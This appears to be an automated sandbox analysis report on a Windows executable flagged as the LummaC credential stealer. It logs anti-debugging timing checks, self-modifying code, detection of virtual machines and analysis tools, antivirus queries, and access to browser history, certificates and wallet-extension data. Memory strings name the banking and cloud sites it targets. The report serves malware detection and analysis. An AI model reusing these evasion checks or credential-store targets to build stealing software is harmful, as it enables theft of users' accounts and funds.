Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5310BBC second address: 5310BEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cx, 19E7h 0x00000007 mov dh, cl 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push ebp 0x0000000d pushad 0x0000000e mov edi, 538E8FC4h 0x00000013 popad 0x00000014 mov dword ptr [esp], esi 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007FA1CCCD2156h 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5310BEB second address: 5310BFD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1CCF9D8BEh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5310C2B second address: 5310C3B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1CCCD214Ch 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 5310C3B second address: 5310C3F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 64AE275 second address: 64AE294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push edi 0x0000000a jmp 00007FA1CCCD2154h 0x0000000f pop edi 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 64AE294 second address: 64AE2AD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FA1CCF9D8C5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 64AE2AD second address: 64AE2B1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 64AE2B1 second address: 64ADB5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 pushad 0x0000000a popad 0x0000000b push dword ptr [ebp+122D16E1h] 0x00000011 jmp 00007FA1CCF9D8C1h 0x00000016 call dword ptr [ebp+122D1D95h] 0x0000001c pushad 0x0000001d jmp 00007FA1CCF9D8C4h 0x00000022 xor eax, eax 0x00000024 sub dword ptr [ebp+122D1D76h], ebx 0x0000002a mov dword ptr [ebp+122D1D76h], esi 0x00000030 mov edx, dword ptr [esp+28h] 0x00000034 cld 0x00000035 cld 0x00000036 mov dword ptr [ebp+122D37E5h], eax 0x0000003c jno 00007FA1CCF9D8BCh 0x00000042 mov esi, 0000003Ch 0x00000047 mov dword ptr [ebp+122D1E60h], edx 0x0000004d stc 0x0000004e add esi, dword ptr [esp+24h] 0x00000052 ja 00007FA1CCF9D8BCh 0x00000058 lodsw 0x0000005a mov dword ptr [ebp+122D2673h], edi 0x00000060 jmp 00007FA1CCF9D8BBh 0x00000065 add eax, dword ptr [esp+24h] 0x00000069 pushad 0x0000006a mov dx, si 0x0000006d sub dl, FFFFFFB8h 0x00000070 popad 0x00000071 mov ebx, dword ptr [esp+24h] 0x00000075 stc 0x00000076 pushad 0x00000077 mov ecx, dword ptr [ebp+122D38D9h] 0x0000007d push ebx 0x0000007e mov edi, dword ptr [ebp+122D37C9h] 0x00000084 pop eax 0x00000085 popad 0x00000086 nop 0x00000087 push eax 0x00000088 push edx 0x00000089 jmp 00007FA1CCF9D8BCh 0x0000008e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 662BCAA second address: 662BCAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 662BCAE second address: 662BCB9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 662AEEE second address: 662AF07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FA1CCCD2146h 0x0000000a pop esi 0x0000000b pushad 0x0000000c jnc 00007FA1CCCD2146h 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 662AF07 second address: 662AF11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FA1CCF9D8B6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 662B179 second address: 662B184 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007FA1CCCD2146h 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 662B184 second address: 662B1AC instructions: 0x00000000 rdtsc 0x00000002 jns 00007FA1CCF9D8B8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a jmp 00007FA1CCF9D8BEh 0x0000000f pop edx 0x00000010 pop eax 0x00000011 ja 00007FA1CCF9D8E0h 0x00000017 push eax 0x00000018 push edx 0x00000019 ja 00007FA1CCF9D8B6h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 662B333 second address: 662B339 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 662EFE1 second address: 662EFE7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 662EFE7 second address: 662F008 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov ecx, dword ptr [ebp+122D3971h] 0x0000000f push 00000000h 0x00000011 xor dword ptr [ebp+122D270Bh], edi 0x00000017 push 83B8D22Ch 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 662F008 second address: 662F00C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 662F00C second address: 662F016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 662F016 second address: 662F0AF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCF9D8C0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a add dword ptr [esp], 7C472E54h 0x00000011 push 00000000h 0x00000013 push esi 0x00000014 call 00007FA1CCF9D8B8h 0x00000019 pop esi 0x0000001a mov dword ptr [esp+04h], esi 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc esi 0x00000027 push esi 0x00000028 ret 0x00000029 pop esi 0x0000002a ret 0x0000002b jmp 00007FA1CCF9D8BEh 0x00000030 push 00000003h 0x00000032 mov edx, dword ptr [ebp+122D34ACh] 0x00000038 push 00000000h 0x0000003a mov dword ptr [ebp+122D1DBDh], ebx 0x00000040 push 00000003h 0x00000042 jmp 00007FA1CCF9D8C9h 0x00000047 call 00007FA1CCF9D8B9h 0x0000004c jmp 00007FA1CCF9D8C0h 0x00000051 push eax 0x00000052 push ecx 0x00000053 push eax 0x00000054 push edx 0x00000055 push esi 0x00000056 pop esi 0x00000057 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 662F0AF second address: 662F0E4 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FA1CCCD2146h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ecx 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f jmp 00007FA1CCCD214Bh 0x00000014 mov eax, dword ptr [eax] 0x00000016 push eax 0x00000017 push edx 0x00000018 jmp 00007FA1CCCD2157h 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 662F0E4 second address: 662F0EA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 662F0EA second address: 662F10F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCCD2151h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp+04h], eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jp 00007FA1CCCD214Ch 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 662F10F second address: 662F113 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 662F113 second address: 662F11D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnc 00007FA1CCCD2146h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 662F201 second address: 662F214 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 jo 00007FA1CCF9D8B6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 662F214 second address: 662F21A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 662F21A second address: 662F222 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 662F222 second address: 662F29B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 popad 0x00000006 nop 0x00000007 mov si, ax 0x0000000a push 00000000h 0x0000000c mov dword ptr [ebp+122D1DCAh], esi 0x00000012 mov dword ptr [ebp+122D284Ch], ebx 0x00000018 call 00007FA1CCCD2149h 0x0000001d je 00007FA1CCCD2152h 0x00000023 jp 00007FA1CCCD214Ch 0x00000029 push eax 0x0000002a jns 00007FA1CCCD2167h 0x00000030 mov eax, dword ptr [esp+04h] 0x00000034 pushad 0x00000035 jbe 00007FA1CCCD214Ch 0x0000003b jne 00007FA1CCCD2146h 0x00000041 push ebx 0x00000042 pushad 0x00000043 popad 0x00000044 pop ebx 0x00000045 popad 0x00000046 mov eax, dword ptr [eax] 0x00000048 push eax 0x00000049 push edx 0x0000004a push eax 0x0000004b push edx 0x0000004c push eax 0x0000004d push edx 0x0000004e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 662F29B second address: 662F29F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 662F29F second address: 662F2A5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 662F2A5 second address: 662F339 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp+04h], eax 0x0000000c jmp 00007FA1CCF9D8BBh 0x00000011 pop eax 0x00000012 stc 0x00000013 push 00000003h 0x00000015 movzx esi, di 0x00000018 push 00000000h 0x0000001a jnl 00007FA1CCF9D8BCh 0x00000020 push 00000003h 0x00000022 push 00000000h 0x00000024 push edi 0x00000025 call 00007FA1CCF9D8B8h 0x0000002a pop edi 0x0000002b mov dword ptr [esp+04h], edi 0x0000002f add dword ptr [esp+04h], 0000001Dh 0x00000037 inc edi 0x00000038 push edi 0x00000039 ret 0x0000003a pop edi 0x0000003b ret 0x0000003c mov di, 339Bh 0x00000040 push 8B8F3EF4h 0x00000045 jmp 00007FA1CCF9D8C8h 0x0000004a add dword ptr [esp], 3470C10Ch 0x00000051 xor dword ptr [ebp+122D294Eh], ebx 0x00000057 lea ebx, dword ptr [ebp+12454EE9h] 0x0000005d mov dword ptr [ebp+122D31E0h], edx 0x00000063 xchg eax, ebx 0x00000064 push edx 0x00000065 pushad 0x00000066 push ebx 0x00000067 pop ebx 0x00000068 push eax 0x00000069 push edx 0x0000006a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 662F3AA second address: 662F415 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edi 0x00000008 nop 0x00000009 mov edx, dword ptr [ebp+122D1D7Bh] 0x0000000f sbb dx, 16B5h 0x00000014 push 00000000h 0x00000016 mov ecx, 3E70162Fh 0x0000001b push 2A153FA4h 0x00000020 jns 00007FA1CCCD2150h 0x00000026 xor dword ptr [esp], 2A153F24h 0x0000002d pushad 0x0000002e mov edx, dword ptr [ebp+122D1F74h] 0x00000034 push edx 0x00000035 mov eax, dword ptr [ebp+122D37B1h] 0x0000003b pop edx 0x0000003c popad 0x0000003d push 00000003h 0x0000003f mov edx, dword ptr [ebp+122D37F5h] 0x00000045 mov edi, dword ptr [ebp+122D38D1h] 0x0000004b push 00000000h 0x0000004d mov dh, D9h 0x0000004f push 00000003h 0x00000051 sub dword ptr [ebp+122D270Bh], edi 0x00000057 push B1C67D00h 0x0000005c pushad 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 push edx 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 662F415 second address: 662F419 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 662F419 second address: 662F431 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FA1CCCD2151h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc

Tries to evade debugger and weak emulator (self modifying code)

Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 5BC87A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 5BC92B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 5BA2E2 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 7E65E3 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 64ADAF1 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 64ADB8A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 66526C0 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 667B66A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\file.exe	Special instruction interceptor: First address: 66655C7 instructions caused by: Self-modifying code

Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion	Jump to behavior

Source: C:\Users\user\Desktop\file.exe TID: 5884	Thread sleep time: -34017s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 3868	Thread sleep time: -36018s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 2436	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\file.exe TID: 4084	Thread sleep time: -32016s >= -30000s	Jump to behavior

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_BIOS

Source: file.exe, file.exe, 00000000.00000002.2463571852.0000000000739000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2358730980.00000000012FC000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655x
Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: discord.comVMware20,11696428655f
Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.co.inVMware20,11696428655d
Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - COM.HKVMware20,11696428655
Source: file.exe, 00000000.00000003.2125813336.0000000005CE4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: - GDCDYNVMware20,11696428655p
Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: global block list test formVMware20,11696428655
Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Transaction PasswordVMware20,11696428655}
Source: file.exe, file.exe, 00000000.00000003.2359277819.00000000012AA000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2464239287.0000000001278000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2464239287.00000000012A7000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2361673958.00000000012AA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: file.exe, 00000000.00000002.2464239287.0000000001311000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU East & CentralVMware20,11696428655
Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655^
Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: account.microsoft.com/profileVMware20,11696428655u
Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: secure.bankofamerica.comVMware20,11696428655\|UE
Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.comVMware20,11696428655}
Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - GDCDYNVMware20,11696428655p
Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - EU WestVMware20,11696428655n
Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office365.comVMware20,11696428655t
Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: microsoft.visualstudio.comVMware20,11696428655x
Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Canara Change Transaction PasswordVMware20,11696428655
Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: outlook.office.comVMware20,11696428655s
Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: www.interactivebrokers.co.inVMware20,11696428655~
Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: ms.portal.azure.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: AMC password management pageVMware20,11696428655
Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: tasks.office.comVMware20,11696428655o
Source: file.exe, 00000000.00000002.2464239287.0000000001311000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - NDCDYNVMware20,11696428655z
Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: turbotax.intuit.comVMware20,11696428655t
Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: interactivebrokers.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696428655
Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: dev.azure.comVMware20,11696428655j
Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: netportal.hdfcbank.comVMware20,11696428655
Source: file.exe, 00000000.00000003.2125813336.0000000005CE4000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: YNVMware
Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Interactive Brokers - HKVMware20,11696428655]
Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: bankofamerica.comVMware20,11696428655x
Source: file.exe, 00000000.00000002.2463571852.0000000000739000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: trackpan.utiitsl.comVMware20,11696428655h
Source: file.exe, 00000000.00000003.2125979800.0000000005C74000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: Test URL for global passwords blocklistVMware20,11696428655

Source: C:\Users\user\Desktop\file.exe

System information queried: ModuleInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Thread information set: HideFromDebugger			Jump to behavior

Tries to detect sandboxes and other dynamic analysis tools (window names)

Source: C:\Users\user\Desktop\file.exe	Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\file.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\Desktop\file.exe	File opened: NTICE
Source: C:\Users\user\Desktop\file.exe	File opened: SICE
Source: C:\Users\user\Desktop\file.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=file.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0			Jump to behavior

Source: file.exe, file.exe, 00000000.00000002.2463571852.0000000000739000.00000040.00000001.01000000.00000003.sdmp

Binary or memory string: 7Program Manager

Source: C:\Users\user\Desktop\file.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\file.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: file.exe, 00000000.00000003.2357972834.0000000005CC8000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2361600016.0000000005CD0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2221296992.0000000005CD0000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000003.2208277597.0000000005CBA000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe

Source: C:\Users\user\Desktop\file.exe

WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: file.exe PID: 2608, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History	Jump to behavior
